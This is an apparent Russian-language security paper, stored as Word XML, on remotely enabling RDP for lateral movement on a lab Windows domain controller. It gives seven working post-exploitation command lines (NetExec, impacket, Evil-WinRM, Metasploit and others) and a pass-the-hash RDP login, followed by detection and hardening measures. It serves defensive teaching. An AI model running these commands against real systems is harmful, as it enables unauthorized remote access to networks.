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Горизонтальное перемещение: удалённое включение RDP</w:t>
        <w:br/>
        <w:t>в сетях Windows и меры обнаружения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техник постэксплуатации и их детектирования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 удалённое включение службы Remote Desktop Protocol (RDP) как техника горизонтального перемещения в сетях Windows. Показано, что при наличии действительных административных учётных данных или NTLM-хеша служба RDP может быть активирована множеством независимых способов. Систематизированы семь техник включения RDP (через WMI, передачу хеша, прямое изменение реестра и модуль постэксплуатации), а также способы подключения. Основное внимание уделено признакам компрометации и мерам обнаружения и противодействия.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горизонтальное перемещение; RDP; постэксплуатация; pass-the-hash; реестр Windows; fDenyTSConnections; обнаружение угроз.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Протокол удалённого рабочего стола (RDP) является важным вектором постэксплуатации при оценке защищённости. Получив после первичной компрометации учётные данные или хеши паролей, атакующий нередко задействует RDP для получения устойчивого графического доступа к системам Windows — даже если служба изначально отключена. Наличие нескольких независимых способов включения RDP обеспечивает атакующему гибкость при срабатывании средств обнаружения. Цель работы — систематизировать эти техники с позиции защитника и сформулировать меры их обнаружения и противодействия.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>2. Испытательный стенд и исходные условия</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Целевая система — контроллер домена DC.ignite.local (192.168.1.11) под управлением Windows Server 2019 с изначально отключённым RDP (порт 3389/tcp закрыт). Предполагается, что атакующий уже располагает административными учётными данными и NTLM-хешем, а также доступом по протоколам SMB, WMI и WinRM. В приводимых командах конкретные пароль и хеш заменены плейсхолдерами &lt;password&gt; и &lt;ntlm-hash&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>3. Ключевой параметр реестра</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Все рассматриваемые техники в конечном счёте воздействуют на один параметр реестра, управляющий разрешением подключений RDP: ключ HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server, параметр fDenyTSConnections типа REG_DWORD. Значение 0 разрешает подключения, значение 1 — запрещает. Различаются лишь способ доставки изменения и используемый протокол.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>4. Техники удалённого включения RDP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.1. Модуль RDP NetExec через WMI (аутентификация по SMB):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nxc smb 192.168.1.11 -u administrator -p &lt;password&gt; -M rdp -o ACTION=enable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.2. Передача хеша (pass-the-hash) через wmiexec с изменением реестра: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nxc smb 192.168.1.11 -u Administrator -H &lt;ntlm-hash&gt;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-x 'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"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   /v fDenyTSConnections /t REG_DWORD /d 0 /f'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.3. Прямое изменение реестра через impacket-reg (без оболочки):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impacket-reg ignite.local/administrator:&lt;password&gt;@192.168.1.11 add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-keyName "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" \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-v fDenyTSConnections -vt REG_DWORD -vd 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.4. impacket-psexec с SYSTEM-оболочкой и командой реестра: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impacket-psexec ignite.local/administrator:&lt;password&gt;@192.168.1.11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reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"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/v fDenyTSConnections /t REG_DWORD /d 0 /f</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.5. Сессия Evil-WinRM (PowerShell, порт 5985):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evil-winrm -i 192.168.1.11 -u administrator -p &lt;password&gt;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Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server"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-Name "fDenyTSConnections" -Value 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.6. Реестр через Samba net rpc (без сторонних инструментов):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net rpc registry setvalue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'HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server' \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'fDenyTSConnections' dword '0' \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 -U ignite.local/administrator%&lt;password&gt; -S 192.168.1.11</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.7. Модуль постэксплуатации Metasploit (в активной сессии Meterpreter):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use post/windows/manage/enable_rdp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set session 1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exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>5. Проверка и подключение</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Факт открытия порта 3389 подтверждается сканированием (служба ms-wbt-server):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nmap -p3389 192.168.1.11</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Для подключения применяются клиенты rdesktop, xfreerdp3 (с поддержкой передачи хеша) и Remmina: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rdesktop 192.168.1.11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xfreerdp3 /u:administrator /pth:&lt;ntlm-hash&gt; /v:192.168.1.11 +clipboard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>6. Обнаружение и меры противодействия</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Поскольку все техники изменяют один параметр реестра и используют протоколы удалённого управления, защита строится эшелонированно. По учётным данным: развёртывание LAPS для ротации локальных паролей, сложность не менее 15 символов, Credential Guard, включение администраторов в группу Protected Users. По NTLM: ограничение NTLM через GPO для предотвращения pass-the-hash. По протоколам доставки: фильтрация портов SMB (445), DCOM/WMI (135 и высокий диапазон) и WinRM (5985/5986), отключение SMBv1 и обязательная подпись SMB, отключение службы RemoteRegistry и ужесточение ACL ветви Winreg, отключение удалённого PowerShell (Disable-PSRemoting). По RDP: ограничение порта 3389 через GPO разрешёнными шлюзами, развёртывание RD Gateway с MFA, обязательный NLA, ограничение прав входа группой Remote Desktop Users. По обнаружению: пересылка журналов в SIEM и оповещения по событиям 4657 (изменение fDenyTSConnections), 4624/4648 (входы SMB/RDP), 7045/4697 (создание служб), 4688 (запуск процессов), а также применение EDR и разрешённых списков приложений (WDAC).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>7. Заключение</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>В работе показано, что обладание действительными учётными данными или NTLM-хешем позволяет удалённо включить RDP как минимум семью различными способами, каждый из которых сводится к изменению параметра fDenyTSConnections по одному из протоколов удалённого управления. Это подчёркивает необходимость эшелонированной защиты: сегментации сети, ротации и изоляции учётных данных, политик доступа к RDP через шлюз и всестороннего журналирования. Контроль одного лишь RDP недостаточен — перекрывать следует и каналы доставки изменения.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MITRE ATT&amp;CK. Lateral Movement: Remote Services — Remote Desktop Protocol (T1021.001).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2. MITRE ATT&amp;CK. Use Alternate Authentication Material: Pass the Hash (T1550.002).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3. Microsoft. Remote Desktop Services registry settings (fDenyTSConnections) documentation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4. Microsoft. Local Administrator Password Solution (LAPS) and Credential Guard documentation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>5. Microsoft. Advanced security audit events (4657, 4624, 4648, 7045, 4688) reference.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